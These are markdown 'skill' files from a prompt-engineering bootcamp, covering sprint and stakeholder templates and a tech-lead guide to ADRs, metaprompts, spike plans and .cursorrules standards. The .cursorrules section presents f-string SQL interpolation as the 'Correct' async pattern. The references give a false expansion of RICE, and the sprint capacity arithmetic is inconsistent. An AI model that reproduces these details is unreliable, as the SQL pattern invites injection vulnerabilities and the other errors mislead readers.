#### Nice-to-Have (If Time)
- [ ] ONBOARD-106: Dark Mode (3 pts) — DEFER
- [ ] ONBOARD-107: Mobile-Responsive Design (5 pts) — DEFER
---
### Capacity Breakdown
| Person | Role | Committed (pts) | Capacity (pts) | Buffer |
|--------|------|-----------------|-----------------|--------|
| Alice | Frontend | 13 (login + upload UI) | 8 | -5 ⚠️ |
| Bob | Backend | 13 (settings + upload) | 8 | -5 ⚠️ |
| Carol | Backend | 12 (reports + integration) | 8 | -4 ⚠️ |
| David | Backend | 8 (invite team) | 8 | 0 |
| Eve | QA | 4 (test planning, edge cases) | 8 | +4 |
| **Total** | | **50 points** | **40** | **-10 ⚠️** |
**⚠️ PROBLEM**: We're overcommitted by 10 points. Either reduce scope or extend timeline.
**RECOMMENDATION**:
- Defer ONBOARD-105 (Invite Team Members) to Sprint 4 (4 pts)
- This brings us to 34 committed points, 6 point buffer
- Adjusts Alice and Bob to 8 and 9 points respectively (achievable)
---
### Dependency Graph
```
ONBOARD-101 (Login)
↓ (required by)
ONBOARD-102 (Settings)
↓ (required by)
ONBOARD-103 (Upload Data)
↓ (required by)
ONBOARD-104 (First Report)
Parallel: ONBOARD-105 (Invite Team) can start once ONBOARD-101 done
Blockers:
- ONBOARD-103 blocked by: Contract with data provider (expected March 18)
- ONBOARD-104 blocked by: Report templates from Product (expected March 15)
```
---
### Risk & Mitigation
| Risk | Impact | Probability | Mitigation |
|------|--------|-------------|-----------|
| Data upload parsing fails | High | Medium | Carol pair-programs with David, use CSV validation library |
| Over-committed team | High | High | **ACTION**: Defer ONBOARD-105 to next sprint |
| Report templates delayed | Medium | Medium | Have placeholder reports ready; update design once templates arrive |
| Pilot customer unavailable | Medium | Low | We have 3 pilots; need 2/3 for sign-off |
---
### Burn-Down Projection
```
Sprint Day 1-3: 38 → 20 points (steep initial progress)
Sprint Day 4-5: 20 → 8 points (testing phase)
Sprint Day 6-7: 8 → 2 points (final polish)
Sprint Day 8-10: 2 → 0 points (buffer)
Expected: Complete 34 committed points by Day 7, 6 point buffer for overflow
```
---
### Pre-Sprint Review Checklist
- [ ] All stories estimated by full team
- [ ] Dependencies identified and documented
- [ ] Risk register reviewed
- [ ] Pilot customer availability confirmed (schedule demo for Day 8)
- [ ] Contract with data provider expected (March 18)
- [ ] Report templates ready from Product (March 15)
```
---
### Skill Generates: Stakeholder Report
```markdown
## Onboarding Portal Status: Steering Committee Update
**Date**: March 15, 2026
**Project**: Customer Onboarding Portal MVP
**Sponsor**: VP of Customer Success
**Status**: 🟢 On Track
---
## Executive Summary
**What We're Doing**: Building a portal to let customers self-onboard (reduce support workload by 60%).
**Status**: Account creation ✅ done, settings in progress, data upload next week.
**Timeline**: Launching March 25 (on schedule) with 3 pilot customers.
**The Ask**: Keep current team allocation through Q2. No budget or headcount changes needed.
---
## Progress This Week
### Completed
✅ **Account Creation & Login** (ONBOARD-101)
- All acceptance criteria met
- Pilot customer tested, zero issues
- Ready to move to production
### In Progress
🔵 **Settings Configuration** (ONBOARD-102)
- 80% complete
- On track to complete March 18
- No blockers
### Upcoming
⏳ **Data Upload** (ONBOARD-103)
- Starts March 19
- Depends on data provider contract (expected March 18)
- Contingency: If contract delayed, we have placeholder workflow ready
---
## Key Metrics
| Metric | Target | Current | Status |
|--------|--------|---------|--------|
| Features complete | 80% by March 20 | 50% (2/4 features) | 🟡 Slightly behind |
| Pilot test sign-off | 2/3 customers | 2/3 piloting | 🟢 On track |
| Test coverage | >80% | 82% | 🟢 Healthy |
| Production readiness | Day 25 | On pace for Day 25 | 🟢 On track |
---
## Risks & Mitigations
| Risk | Status | Mitigation |
|------|--------|-----------|
| Data provider contract signed | 🟡 Watching | Contract lawyer expediting; fallback: placeholder API |
| Report templates delayed | 🟡 Watching | Have basic template ready; fine-tune after launch |
| Pilot customer feedback slow | 🟢 Mitigated | Scheduled weekly syncs; have 3 pilots so feedback redundancy |
---
## What We Need
**No asks at this time.** All required resources allocated. Keep current team through March 25 launch.
---
**Next Steering Update**: March 22
**Launch Date**: March 25
**Owner**: [PM name]
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map your product work to ABCD:
```
Action: Build customer onboarding portal
Behavior: Reduce implementation time 50%, ship with 70% adoption
Context: Self-serve lowers support burden, improves NPS
Delivered: Launch-ready, 3 pilot customers validated
```
### Using with ReAct Pattern
Systematically prioritize features:
```
THINK: What delivers value soonest? What's blocked?
ACT: Score features on value/effort/risk matrix
OBSERVE: Does ranked backlog align with business goals?
```
### Using with Tree of Thoughts
Complex roadmap decisions:
```
Generate: 3 prioritization approaches (customer-driven, revenue-driven, risk-driven)
Evaluate: Which aligns with company strategy?
Choose: Revenue-driven approach because it funds next headcount
```
---
## When to Use This Skill vs. Spreadsheet
| Task | Use Spreadsheet | Use Skill |
|------|-----------------|-----------|
| Quick vote on feature priority | ✅ Fast | ❌ Overkill |
| One-off status update | ✅ Simple | ❌ Overhead |
| Structured sprint planning | ❌ Too chaotic | ✅ **This skill** |
| **Requirements for complex feature** | ❌ Gets messy | ✅ **This skill** |
| **Roadmap for uncertain futures** | ❌ Too many assumptions | ✅ **This skill** |
| **Stakeholder alignment meeting** | ❌ Scattered | ✅ **This skill** |
| **Risk register with mitigations** | ❌ Spreadsheets don't capture logic | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Applied Patterns** when discussing:
- Spec-kit methodology (knowledge → spec → plan → execution)
- Structured interrogation for context-gathering
- Alignment through structured artifacts
- Stakeholder communication patterns
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "PO" or "PM" in a role-fork scenario
- You need to capture requirements from stakeholders
- You're planning a sprint or roadmap
- You need to communicate status to executives
- You're new to product management and need guidance
**Expected outcome:**
- Understand how interrogation surfaces hidden constraints
- See spec-kit methodology in action
- Generate executive-ready artifacts in minutes
- Build alignment through structured, repeatable formats
---
## FAQ
**Q: Will this skill tell me what features to build?**
A: No. It surfaces the context and structure to *help you decide*. You have the domain expertise and business intuition; this skill structures that thinking.
**Q: What if I don't know the answers to all 25 interrogation questions?**
A: That's expected! The skill will ask follow-ups to clarify. Unknown answers are insights — they reveal what you need to discover.
**Q: How is this different from just asking an LLM for a roadmap?**
A: The interrogation phase forces you to think through business context, team capacity, and risks *before* generating artifacts. Bad interrogation = bad roadmap. Rich interrogation = trusted roadmap.
**Q: Can I use this for agile projects with ongoing backlog refinement?**
A: Yes. Use it for sprint planning (refresh every 2 weeks) and quarterly roadmap reviews. The skill works iteratively.
**Q: What if my team has a different estimation system (T-shirt sizes, fibonacci)?**
A: Tell the skill during interrogation: "We estimate with T-shirt sizes (S/M/L/XL)." It will adjust the output format.
**Q: Can I use this for non-tech products?**
A: Absolutely. The framework works for any product/project with stakeholders, scope, and timeline. Interrogation questions adapt to your domain.
---
## References
- **Spec-Kit Methodology**: Joey's Prompt Engineering Bootcamp v2, Session 1
- **Given/When/Then Format**: Cucumber/BDD specification patterns (Wynne & Hellesøy, 2012)
- **Roadmap Prioritization**: RICE framework (Rice, Eisenhower, Cost, Effort)
- **Stakeholder Communication**: HBR "The Art of the Executive Summary" (2023)
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2
---
# skills-tl-second-brain.md
# https://jrlopez.dev/p/skills-tl-second-brain.md
---
name: tl-second-brain
description: Tech Lead second brain — interrogation-driven architecture decisions, metaprompting, and team technical standards using systematic patterns
version: 1.0
---
# Tech Lead Second Brain Skill
## Overview
The **Tech Lead Second Brain** is an expert advisor that guides tech leads through strategic technical decisions using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about system architecture, team capabilities, and constraints before proposing solutions
2. **Structure gets rewarded** — Uses structured output (ADRs, decision matrices, prompts) instead of loose advice
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for architectural patterns and team standards
This skill enables tech leads to tackle:
- ✅ Architecture Decision Records (ADRs) — systematic multi-option evaluation using Tree of Thoughts
- ✅ Metaprompting — creating prompts that generate role-specific prompts for the team
- ✅ Technical Spike Planning — scoping investigation work with clear decision criteria and time-boxes
- ✅ Team Technical Standards — building .cursorrules, .windsurfrules, and copilot instructions
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers comprehensive context before generating architecture decisions using a **20-question style interview** adapted for tech leadership:
- **System Architecture**: Current and target architecture patterns
- **Technical Stack**: Languages, frameworks, key dependencies, version constraints
- **Team Context**: Technical maturity levels, team size, key expertise gaps
- **Non-Functional Requirements**: Scale, latency, availability, throughput targets
- **Integration Points**: How this system touches others; dependency map
- **Operational Context**: Deployment pipeline, monitoring, observability, incident response
- **Constraints**: Budget, timeline, compliance, security requirements, technical debt inventory
### 2. Tree of Thoughts for Architecture Decisions
Generates decision options with **GENERATE → EVALUATE → DECIDE** pattern:
```
GENERATE: What are 3 fundamentally different approaches to this problem?
EVALUATE: What are the pros/cons/risks of each option?
DECIDE: Which option best balances constraints and team capabilities?
```
### 3. Metaprompting for Team Amplification
Generates prompts that generate prompts — the key differentiator for tech leadership:
```
Metaprompt: A prompt that, when given to team members or AI assistants,
produces role-specific guidance (e.g., "Architect a caching strategy" prompt
that generates backend engineer, DevOps engineer, and QA engineer prompts)
```
### 4. Structured Output Formats
- **Architecture Decision Record (ADR)**: Context, Decision, Options Evaluated, Consequences
- **Metaprompt**: Hierarchical prompt with role-specific branches
- **Technical Spike Plan**: Investigation scope, success criteria, decision gates, time-box
- **Team Standards File**: .cursorrules or .windsurfrules with patterns and anti-patterns
---
## Usage Scenarios
Choose the scenario matching your current leadership challenge:
### **Scenario A: Architecture Decision Record (ADR)**
*Major architectural choice with lasting impact; requires systematic evaluation*
**When to use**: "Should we decompose our monolith or use strangler fig pattern?"
**What you'll get**: 3 options evaluated via Tree of Thoughts, ADR document, implementation roadmap
### **Scenario B: Metaprompting**
*Create team-specific AI workflows; build prompts that generate prompts*
**When to use**: "I need each engineer to get role-specific architecture guidance"
**What you'll get**: Metaprompt with engineer/DevOps/QA/security role branches, usage examples
### **Scenario C: Technical Spike Planning**
*Scope investigation work, define decision criteria, time-box unknowns*
**When to use**: "We need to evaluate if we should migrate to Kubernetes"
**What you'll get**: Spike plan with investigation phases, success criteria, decision gates, 1-2 week time-box
### **Scenario D: Team Technical Standards**
*Codify architectural patterns, create .cursorrules for AI-assisted development*
**When to use**: "Our team needs shared standards for async/await, error handling, logging"
**What you'll get**: .cursorrules file with patterns, anti-patterns, examples, and rationale
---
## Structured Interrogation Framework
The skill will ask you these questions to build architectural context:
### Phase 1: Current Architecture (6-8 questions)
1. **Current System Design**: Monolith? Microservices? Event-driven? Hybrid?
2. **Technology Stack**: Languages, frameworks, databases, message queues, key versions?
3. **Scale Context**: Transactions/sec? Users? Data volume? Growth rate?
4. **Team Size & Skills**: How many engineers? Key expertise areas? Skill gaps?
5. **Operational Maturity**: CI/CD setup? Monitoring? On-call model? Incident response process?
6. **Technical Debt**: What's the biggest pain point? What slows down development?
### Phase 2: Target State & Constraints (4-5 questions)
7. **Strategic Goal**: What problem are we solving? What's the business driver?
8. **Success Metrics**: How will we know this decision was right? (Latency? Throughput? Developer velocity?)
9. **Hard Constraints**: Budget limits? Timeline? Compliance/security requirements? Team availability?
10. **Integration Requirements**: What other systems must this integrate with? Dependencies?
### Phase 3: Organizational Context (3-4 questions)
11. **Team Maturity**: Can the team handle microservices? Distributed systems? New frameworks?
12. **Organizational Appetite for Change**: How much disruption is acceptable? What's the change window?
13. **Support & Tooling**: What infrastructure already exists? What would we need to build?
14. **Decision Authority**: Who decides? What's the approval process?
### Phase 4: Risk & Knowledge (2-3 questions)
15. **Similar Decisions**: Have we done something like this before? What worked/didn't?
16. **Hidden Risks**: What keeps you up at night about this decision?
17. **Decision Timeline**: When does this decision need to be made? How long to implement?
---
## Output Format Specification
### 1. Architecture Decision Record (ADR) with Tree of Thoughts
```
## ADR-NNN: [Decision Title]
### Context
- **Problem Statement**: What decision are we making and why?
- **Constraints**: Timeline, budget, team size, technical/organizational limits
- **Success Criteria**: How will we measure if this was the right choice?
### Options Generated (Tree of Thoughts)
All options are fundamentally different approaches, not variations on one idea.
#### Option A: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Aligned with team's async-first expertise
- Integrates with existing event bus
- Reduces deployment complexity by 40%
**Cons**:
- Requires learning new framework (month ramp-up)
- Database migration needed (2-3 weeks downtime risk)
- Limited ecosystem for advanced features
**Risks**:
- [ ] High: Team has no experience with this pattern
- [ ] Medium: Performance impact on latency-sensitive paths
- [ ] Low: Vendor lock-in on managed service
#### Option B: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Team already knows this pattern
- Drop-in replacement for existing system
- Zero database migration needed
**Cons**:
- Doesn't solve scalability issue (5x growth)
- Tight coupling increases technical debt
- Deployment remains slow (30min per release)
**Risks**:
- [ ] High: Can't scale beyond current hardware
- [ ] Low: Team complacency if we don't modernize
- [ ] Medium: Vendor might discontinue support
#### Option C: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Industry-standard, proven at scale
- Excellent tooling and community support
- Phased migration possible (no big bang)
**Cons**:
- Requires hiring 2 new specialists ($200K)
- Operational complexity increases significantly
- Steep learning curve for existing team
**Risks**:
- [ ] Medium: Budget overrun on hiring/training
- [ ] Medium: Team turnover if overwhelmed
- [ ] Low: Overengineering for current scale
### Decision
**CHOOSE**: Option [A/B/C]
**Rationale**:
- Best aligns with constraint: [which one]
- Team capability fit: [how well]
- Risk mitigation: [which risks are we accepting]
- Implementation timeline: [realistic estimate]
### Consequences
#### Positive
- Unblocks team for feature velocity
- Reduces technical debt in [specific area]
- Aligns with 3-year platform roadmap
#### Negative
- Requires 6-week learning curve
- Database migration has 2hr maintenance window
- Initial performance tuning needed (2 weeks)
#### Action Items
- [ ] Spike: Create proof-of-concept (1 week)
- [ ] Plan: Detailed migration roadmap (1 week)
- [ ] Team: Schedule training sessions (4 weeks before go-live)
- [ ] Infrastructure: Provision staging environment (parallel to above)
- [ ] Communication: Announce decision and timeline to stakeholders
---
```
### 2. Metaprompt Structure
```
# Metaprompt: [Topic - e.g., "Caching Strategy Design"]
## Role: [System Architect]
### Primary Mission
Generate a [caching strategy] for [context] that:
- Meets performance targets: [specific metrics]
- Respects constraints: [budget, team, operational limits]
- Follows team patterns: [specific patterns/standards]
### Interrogation Phase
Ask the team member these questions to build context:
**System Context**:
1. What's the current cache topology?
2. What's the primary bottleneck? (CPU? I/O? Network?)
3. What's the acceptable cache invalidation latency?
**Team Context**:
4. Does the team have Redis expertise?
5. What's the operational overhead appetite?
### Generation Phase
For each question answered, generate:
**For Backend Engineer**:
- Code examples for cache client integration
- Error handling patterns
- Testing strategy (mocked cache, real cache, cache failure scenarios)
**For DevOps Engineer**:
- Infrastructure requirements (Redis cluster size, failover setup)
- Monitoring/alerting strategy
- Disaster recovery and backup procedures
**For QA Engineer**:
- Cache hit/miss ratio testing
- Load testing strategy
- Failure scenario testing (cache outage, network partition)
**For Security Engineer**:
- Data sensitivity of cached items
- TTL strategy for sensitive data
- Access control and encryption needs
### Rationale
- Caching at [layer] because: [specific reason]
- [Pattern name] chosen because: [tradeoff analysis]
- TTL of [X] balances [freshness vs. hits]
---
```
### 3. Technical Spike Plan
```
## Technical Spike: [Investigation Topic]
### Objective
**Question**: Should we migrate to [technology/pattern]?
**Success Criteria**:
- [ ] Proof-of-concept running
- [ ] Performance benchmarks vs. current system
- [ ] Team impact assessment (learning curve, hiring needs)
- [ ] Cost/benefit analysis with 3-year projection
- [ ] Risk mitigation strategy documented
### Investigation Phases (1-2 weeks total)
#### Phase 1: Discovery (3 days)
**THINK**: What are we actually investigating?
- Read architecture docs of target technology
- Identify key decision points
- Map to current system constraints
**ACT**:
- [ ] Create minimal POC (single component)
- [ ] Document assumptions
**OBSERVE**:
- [ ] Does the POC work as expected?
- [ ] Did we discover new constraints?
#### Phase 2: Evaluation (3-4 days)
**THINK**: How does this perform vs. our requirements?
- Latency benchmarks
- Scalability testing
- Operational complexity assessment
**ACT**:
- [ ] Run performance tests under load
- [ ] Document operational requirements
- [ ] Interview experts who've used this
**OBSERVE**:
- [ ] Performance targets met/missed?
- [ ] Team capability realistic?
#### Phase 3: Decision Gates (1-2 days)
**THINK**: Can we make a recommendation?
- Compile findings
- Create decision matrix
- Assess risks
**ACT**:
- [ ] Create summary document
- [ ] Present findings to stakeholders
**OBSERVE**:
- [ ] Is the recommendation clear?
- [ ] Can we commit to next steps?
### Decision Gates
| Gate | Criteria | Owner | Target Date |
|------|----------|-------|-------------|
| **POC Success** | POC runs on developer laptop | [Engineer] | Day 3 |
| **Performance** | Meets latency targets, 50% throughput improvement | [Engineer] | Day 6 |
| **Team Fit** | Team learning curve acceptable, or hiring plan clear | [TL] | Day 7 |
| **Financial** | 3-year TCO justifies migration cost | [PM] | Day 8 |
### Not in Scope (Explicitly)
- Full migration plan (save for post-decision work)
- Integration with all downstream systems
- Vendor negotiation
- Detailed architecture design
---
```
### 4. Team Technical Standards File (.cursorrules)
```
# .cursorrules - Team Technical Standards for [Project]
## Vision
[1 sentence: What architectural pattern defines our work?]
Example: "We are a synchronous microservices team that values consistency and observable deployments."
## Core Patterns
### 1. Async/Await Design
When to use async:
- All I/O operations (network, database, file system)
- All service-to-service communication
- Never block request threads
```python
# PATTERN: Async I/O
async def get_user(user_id: int):
"""Correct: Returns awaitable, never blocks"""
user = await db.query(f"SELECT * FROM users WHERE id = {user_id}")
return user
# ANTI-PATTERN: Blocking I/O
def get_user(user_id: int):
"""Wrong: Blocks request thread, kills throughput"""
user = requests.get(f"https://userapi.com/{user_id}")
return user
```
### 2. Error Handling
Pattern: Explicit exceptions + structured logging
```python
# PATTERN: Named exceptions with context
class PaymentProcessingError(Exception):
def __init__(self, user_id: int, amount: float, reason: str):
self.user_id = user_id
self.amount = amount
self.reason = reason
try:
await process_payment(user_id, amount)
except PaymentProcessingError as e:
logger.error("payment_failed", extra={
"user_id": e.user_id,
"amount": e.amount,
"reason": e.reason
})
raise
# ANTI-PATTERN: Generic exceptions
try:
process_payment(user_id, amount)
except Exception as e:
logger.error(f"Error: {e}") # No context!
```
### 3. Logging Standards
Pattern: Structured JSON, never string interpolation
```python
# PATTERN: Structured logging
logger.info("order_created", extra={
"order_id": order.id,
"user_id": order.user_id,
"amount": order.total,
"items_count": len(order.items)
})
# ANTI-PATTERN: String formatting
logger.info(f"Order {order.id} created for user {order.user_id}") # Not queryable!
```
### 4. Service Boundaries
Pattern: Clear input/output contracts, versioned APIs
```python
# PATTERN: Explicit contracts
@router.post("/v1/orders")
async def create_order(request: CreateOrderRequest) -> CreateOrderResponse:
"""
Input contract: CreateOrderRequest (pydantic model)
Output contract: CreateOrderResponse
Versioning: URL path includes version
"""
pass
# ANTI-PATTERN: Implicit contracts
@router.post("/orders")
def create_order(data): # What's expected? What's returned?
return {"order_id": 123}
```
## Anti-Patterns
### ❌ Circular Dependencies
```python
# WRONG: Service A imports Service B imports Service A
# Fix: Use message queue or shared interface
```
### ❌ Blocking Operations in Async Code
```python
# WRONG
async def get_data():
time.sleep(1) # Blocks entire event loop!
# RIGHT
async def get_data():
await asyncio.sleep(1)
```
### ❌ Monolithic Error Handlers
```python
# WRONG
try:
orchestrate_entire_workflow()
except Exception:
logger.error("Something went wrong")
# RIGHT
try:
result = await step1()
except Step1Error as e:
logger.error("step1_failed", extra={"reason": e.reason})
# Handle step1-specific failure
try:
result = await step2(result)
except Step2Error as e:
logger.error("step2_failed", extra={"reason": e.reason})
# Handle step2-specific failure
```
## Code Review Checklist
- [ ] No synchronous I/O in async functions
- [ ] All exceptions named and contextual
- [ ] Logging is structured JSON, queryable
- [ ] Service boundaries clear (input/output contracts)
- [ ] No circular dependencies
- [ ] Tests cover happy path + at least 2 error scenarios
- [ ] Type hints on all function signatures
## When to Break These Patterns
Only with explicit TL approval and documented rationale.
File issue: `patterns: [pattern-name]: [reason for exception]`
---
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"We need to decide: monolith or microservices?"
→ Scenario A (Architecture Decision Record)
"I want to teach our engineers to make consistent caching decisions"
→ Scenario B (Metaprompting)
"Should we invest in Kubernetes? Need to understand before committing"
→ Scenario C (Technical Spike Planning)
"Our async code is inconsistent; need shared standards"
→ Scenario D (Team Technical Standards)
```
### Step 2: Let the Skill Interrogate
The skill will ask 15-17 questions. **Answer fully and honestly** — this is where decision quality happens.
Example interrogation flow for Scenario A:
```
Q1: Current architecture?
A: Monolithic Django app, 300K lines, 8-person team
Q2: What's driving the decision?
A: Deployment pipeline is slow (30min per release), tightly coupled services
Q3: Team's distributed systems experience?
A: Limited; one engineer has microservices experience at previous company
Q4: Non-functional requirements?
A: Need to ship 5x faster, scale to 10M users (currently 1M)
Q5: Budget?
A: Can hire 2 new engineers, but not unlimited
[... continues through all 15+ questions ...]
```
### Step 3: Review Generated Artifacts
The skill will output:
- ✅ ADR with Tree of Thoughts (3 options evaluated)
- ✅ Risk assessment for each option
- ✅ Decision with clear rationale
- ✅ Consequences (positive, negative, action items)
Or (depending on scenario):
- ✅ Metaprompt with role-specific branches
- ✅ Technical spike plan with decision gates
- ✅ .cursorrules file with patterns and examples
### Step 4: Communicate & Execute
Use the generated artifact to:
- Share decision with stakeholders (ADR)
- Guide team members (Metaprompt)
- Scope investigation work (Spike Plan)
- Enforce team standards (Standards File)
---
## Design Principles
### Principle 1: Context Over Templates
**Never recommend a pattern without understanding:**
- What problem does this solve?
- What constraints does the team face?
- What is the team capable of executing?
- What are the realistic consequences?
The interrogation phase ensures we have rich architectural context before any recommendation.
### Principle 2: Structure Over Intuition
**Always output:**
- Structured decision matrices (not narratives)
- Risk assessments (not "it should work")
- Checklists (not suggestions)
- Testable criteria (not vague success)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Multiple Options by Default
**Tree of Thoughts requires:**
- 3+ fundamentally different approaches (not variations)
- Honest evaluation of trade-offs (pros/cons/risks)
- Clear decision rationale (why we chose this one)
- Risk acceptance acknowledgment (what are we giving up)
This prevents premature convergence on a familiar option.
### Principle 4: Team Capability Matters
**Always respect:**
- Team size and skill composition
- Learning curve for new patterns
- Operational overhead they can sustain
- Organizational appetite for change
This is where interrogation questions pay dividends.
---
## Example: Complete Workflow
### Scenario: Architecture Decision Record
**You say:**
```
We have a legacy banking system (Java monolith, 20 years old, 500K lines).
We need to modernize it, but can't afford downtime or a complete rewrite.
Should we decompose it or use strangler fig pattern?
```
**Skill interrogates (Phase 1: Current Architecture):**
```
Q1: Current system structure?
→ Monolithic Java app, tightly coupled, 50+ teams writing to it
Q2: Technology stack?
→ Java 8, Spring 3.2, Oracle database, 2.5GB data, batch jobs at 2am
Q3: Scale?
→ 100K transactions/day, 1ms latency requirement, 99.99% uptime
Q4: Team composition?
→ 50 Java engineers, 5 DevOps, no Go/Rust experience
Q5: Technical debt?
→ No API contracts, shared database, monolithic deployments
```
**Skill interrogates (Phase 2: Target State & Constraints):**
```
Q6: What's the business driver?
→ Need to ship faster (currently 3 weeks per feature), reduce outages
Q7: Success metrics?
→ Deploy weekly, feature velocity +300%, reduce outages by 80%
Q8: Hard constraints?
→ Can't have >5 min downtime, budget is $500K for next year, timeline is 18 months
Q9: Integration requirements?
→ Must talk to 10 other systems via APIs
```
**Skill interrogates (Phase 3: Organizational Context):**
```
Q10: Team maturity?
→ Good at Java, but distributed systems is new territory
Q11: Change appetite?
→ Executive pressure to modernize, but risk-averse on production
Q12: What already exists?
→ CI/CD is solid (Jenkins), monitoring basic (Splunk), no Kubernetes
```
**Skill generates: ADR with Tree of Thoughts**
```markdown
## ADR-042: Legacy Banking System Modernization Strategy
### Context
- **Problem**: Monolithic Java app (500K lines, 50 teams) blocks feature velocity
and creates deployment risk
- **Constraints**:
- Can't tolerate >5min downtime
- 18-month timeline
- 50 Java engineers (no distributed systems experience)
- $500K budget
- **Success Criteria**:
- Weekly deployments (vs. 3 weeks today)
- Reduce outages by 80%
- Feature team velocity +300%
### Options Generated (Tree of Thoughts)
#### Option A: Big Bang Microservices Rewrite
**THINK**: Complete rewrite to microservices
Architecture:
- Decompose into 15 domain-driven microservices
- Each service: own database, async communication via message queue
- Migrate all 50 teams into new services
- Sunset monolith over 18 months
**EVALUATE**:
**Pros**:
- Clean slate, no legacy code baggage
- Team expertise naturally distributed
- True decoupling, independent deployments
**Cons**:
- 18-month timeline is VERY tight for 500K LOC
- Requires hiring distributed systems experts we don't have
- Monolith must run in parallel → 2x infrastructure cost
- High organizational disruption (teams restructure)
- No way to incrementally validate approach
**Risks**:
- [ ] **High**: Timeline will slip (probably 24-30 months realistically)
- [ ] **High**: Quality issues in new system (unproven architecture)
- [ ] **Medium**: Team burnout (learning curve + feature delivery)
- [ ] **High**: Can't stop in middle; fully committed
- [ ] **Medium**: Coordination overhead (15 teams, new patterns)
---
#### Option B: Strangler Fig Pattern (Incremental)
**THINK**: New services gradually replace monolith functions
Architecture:
- Deploy API Gateway in front of monolith
- For each domain: build new microservice alongside monolith
- Route traffic gradually to new service
- Monolith shrinks over time as services take over
- Databases remain coupled initially, decouple incrementally
**EVALUATE**:
**Pros**:
- Incremental validation: prove each service works before next
- Can stop at any point with useful system
- Teams can move independently (minimal coordination)
- Less organizational disruption
- Leverage existing Java expertise; grow distributed systems knowledge gradually
- 18-month timeline is achievable
**Cons**:
- Temporary duplication (gateway routes to both systems)
- Database coupling remains longer (harder to scale)
- Initial velocity might drop (building alongside shipping)
- Requires discipline to retire monolith code (technical debt temptation)
**Risks**:
- [ ] **Medium**: Gateway becomes bottleneck (mitigated by load testing)
- [ ] **Low**: Teams lose focus (mitigated by clear roadmap)
- [ ] **Medium**: Database refactoring delayed too long (needs explicit schedule)
- [ ] **Low**: Monolith stays forever (organizational discipline needed)
---
#### Option C: Hybrid: Extract Bounded Contexts in Monolith
**THINK**: Modularize monolith first; extract microservices later if needed
Architecture:
- Apply DDD: identify 5-7 bounded contexts within monolith
- Refactor monolith into internal services (compile-time modules, not runtime services)
- After stabilization (6-12 months), extract into actual microservices if needed
- More conservative approach with proven deployment
**EVALUATE**:
**Pros**:
- Uses team's existing Java expertise fully
- No dual system running in parallel
- Lower infrastructure cost (single deployment)
- Fast initial wins (improved code organization)
- Proven pattern with many successful examples
**Cons**:
- Doesn't truly solve monolithic deployment problem
- Still shared database and tightly coupled at runtime
- Team structure still monolithic (harder to ship independently)
- May require rework if microservices become necessary later
- Doesn't address 18-month timeline pressure
**Risks**:
- [ ] **High**: Never makes the jump to true microservices (organizational complacency)
- [ ] **Medium**: Refactoring effort delays feature work initially
- [ ] **Low**: Bounded contexts are wrong (revisit after 6 months)
---
### Decision
**CHOOSE: Option B (Strangler Fig Pattern)**
**Rationale**:
- **Constraint fit**: 18-month timeline is achievable with incremental approach; Big Bang too risky; Hybrid doesn't solve the problem
- **Team capability**: Leverages Java expertise, allows gradual learning curve for distributed systems
- **Risk profile**: Can validate each service before committing fully; can pause and still have a working system
- **Business alignment**: Weekly deploys by month 12; outage reduction measurable every quarter; feature velocity improves with each new service
- **Organizational change**: Gradual team restructuring vs. complete disruption
### Consequences
#### Positive
- **Monthly wins**: One new service every 4-6 weeks = visible progress
- **Reduced deployment risk**: Canary deploy each new service independently
- **Knowledge transfer**: Team learns microservices patterns incrementally
- **Optionality**: Can pause at month 12 with 7 services extracted and still succeed
#### Negative
- **Temporary overhead**: Gateway routing, database coupling for 12-18 months
- **Coordination complexity**: Monolith + new services must stay in sync
- **Developer experience**: Some friction around API Gateway debugging
- **Timeline pressure**: Any delays in first services cascade
#### Risks We Accept
- [x] Medium: Gateway becomes bottleneck → Mitigated by aggressive load testing by month 2
- [x] Medium: Database refactoring gets delayed → Mitigated by explicit roadmap (must extract by month 15)
- [x] Low: Organizational discipline fades → Mitigated by clear success metrics per service
### Action Items
- [ ] **Month 1**: Design API Gateway, identify first 3 domains to extract
- [ ] **Month 1**: Hire distributed systems consultant for 3-month engagement
- [ ] **Month 2**: Proof-of-concept: extract first service (Payments domain)
- [ ] **Month 3**: Load test Gateway with production traffic patterns
- [ ] **Month 4**: Go live with Service 1, monitor closely
- [ ] **Month 6**: Complete Services 2-3, celebrate progress internally
- [ ] **Month 12**: 7 services extracted, weekly deployments active
- [ ] **Month 18**: Critical remaining domains extracted; evaluate: keep Gateway or full microservices?
### Implementation Roadmap
| Service | Start | Live | Database | Teams |
|---------|-------|------|----------|-------|
| Payments | M2 | M4 | Shared (couple with existing) | Finance (5) |
| Accounts | M3 | M5 | Own DB (M8) | Customer (4) |
| Transactions | M4 | M6 | Own DB (M10) | Core Ops (6) |
| Compliance | M5 | M7 | Shared initially | Risk (3) |
| Reporting | M6 | M8 | Read replicas | Analytics (2) |
| Fraud Detection | M7 | M9 | Own DB (M14) | Security (4) |
| API Orchestration | M8 | M10 | N/A | Platform (4) |
---
```
**Skill generates: Risk Mitigation Strategy**
```markdown
## Risk Mitigation for Strangler Fig Pattern
### High-Risk: Gateway Becomes Bottleneck
**Mitigation**:
- Load test by month 2 with production traffic patterns
- Design Gateway with horizontal scaling from day 1
- Monitor latency; alert if p99 > 50ms
### Medium-Risk: Database Refactoring Gets Postponed
**Mitigation**:
- Hard deadline: Service X must have own database by month Y
- Include in sprint goals, not "nice to have"
- Track database coupling metric (% queries to old DB)
### Medium-Risk: Coordination Chaos
**Mitigation**:
- Weekly architecture sync (30 min)
- Shared schema change process (coordinate API Gateway routes)
- Runbooks for common failure scenarios
---
```
**Skill generates: Team Communication Template**
```markdown
